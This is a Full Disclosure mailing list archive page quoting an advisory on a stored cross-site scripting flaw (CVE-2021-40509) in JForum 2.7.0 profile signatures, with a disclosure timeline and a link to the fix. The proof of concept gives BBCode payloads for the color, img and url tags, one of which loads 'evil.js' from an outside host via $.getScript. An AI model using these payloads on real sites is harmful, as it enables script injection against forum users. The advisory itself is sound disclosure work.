Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: a xss vulnerability in Jforum 2.7.0

From: Henri Salo <henri () nerv fi>
Date: Tue, 7 Sep 2021 10:44:43 +0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:

 hi,

   I found a vulnerability in the jforum 2.7.0. It is a storage cross site
script vulnerability. The place is the user's profile - signature. The
technique of the vulnerability is the same as that described in this
article "STORED CROSS SITE SCRIPTING IN BBCODE" (
https://mindedsecurity.com/advisories/msa130510/), and the POC is:

color tag:
[color=red" onMouseOver="alert('xss')]XSS[/color]
[color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js&apos;)
;"]XSS[/color]
Renders into HTML:
<font onmouseover="alert('xss')" color="red">XSS</font>
<font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js&apos;);"
color="red">XSS</font>

img tag:
[img]/demo.jpg" onMouseOver="alert('xss')[/img]
Renders into HTML:
<img src="/demo.jpg" onmouseover="alert('xss')" alt="image">

url= tag:
[url='http://www.demo.com"; onMouseOver="alert('xss')']test[/url]
Renders into HTML:
<a class="snap_shots" href="http://www.demo.com"; onmouseover="alert('xss')"
target="_blank">test</a>

through analysis, the forum has set the cookie to http-only, but the
attacker can use the $.getScript to do some evil things.

this vulnerability has been fixed in
https://sourceforge.net/p/jforum2/code/934/ .

timeline:
2021-04-21 announce the developer of Jforum by e-mail
2021-04-22 Jforum fixed the vulnerability, and will include this fix in
next release
2021-09-02 send this mail to bugtraq&fulldisclosure


CVE-2021-40509 has been assigned for this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE/aVSDznAZReWTkxKJ633pE6qdXQFAmE3GGgACgkQJ633pE6q
dXRbUA//fgeWQCIQzYDgZ6venNplzRBsCamTVWK2miur4NjIqKFtza4namiEn1GK
9+Fw4llZdmcdLV2iE5HVo1EPwg1RKgKqEFWlat8cLNWyzPFazh3Mv8gJgAAPnfgB
HdODZGE8cXnTZ2nK1FZqTtGbh7vTcs9AlWzpEwZgZs+BzWzX6VO/gxC2iQcA4ePq
6/xKsUbO46SKZpZ+pZt45V9r4EcibgU69cXwtPeywE2NRjlM9VsReWz+p3CVR3Sv
px6mK3G4sjyHyPIhkDwVMwUziPT5FfLuAPYI6VEweMsCUgyUfj48xu+pmTYwCQ1R
8LSjllEU2qsGvs0oMGs7AEp5T1c/kDP7xgS761gUivjl1J//szu+QScC0jKYVdEX
DWp672UpzB3F4xsMTeQu7U7zq+NRS2ySNs3gB2cvqsjS8lDIMdrnThqZny/K7jhC
TCrfTYDTsej1jlMWR3mTiFIhNNhPPoSg+Opab1wnqQwO3JIE9xVqNNTsyIH+aCMK
jUlZZAbJwfb3WNJMJHI+9gxh1XgLf5NhgsSlzSpWcnM/soXOYzi3EdYlvuc0cTQ7
X3082dHC7A2Y1Lm9fTqvwsQ+BGV0rR8FxhwAfqweNz7AH5rAIbalj+mVFweSaUU/
k2Vd4Jt8QjfmzaTMMpLxUPjA3vlaIBxYnz/T33chZ119PRG9vNc=
=fWS4
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: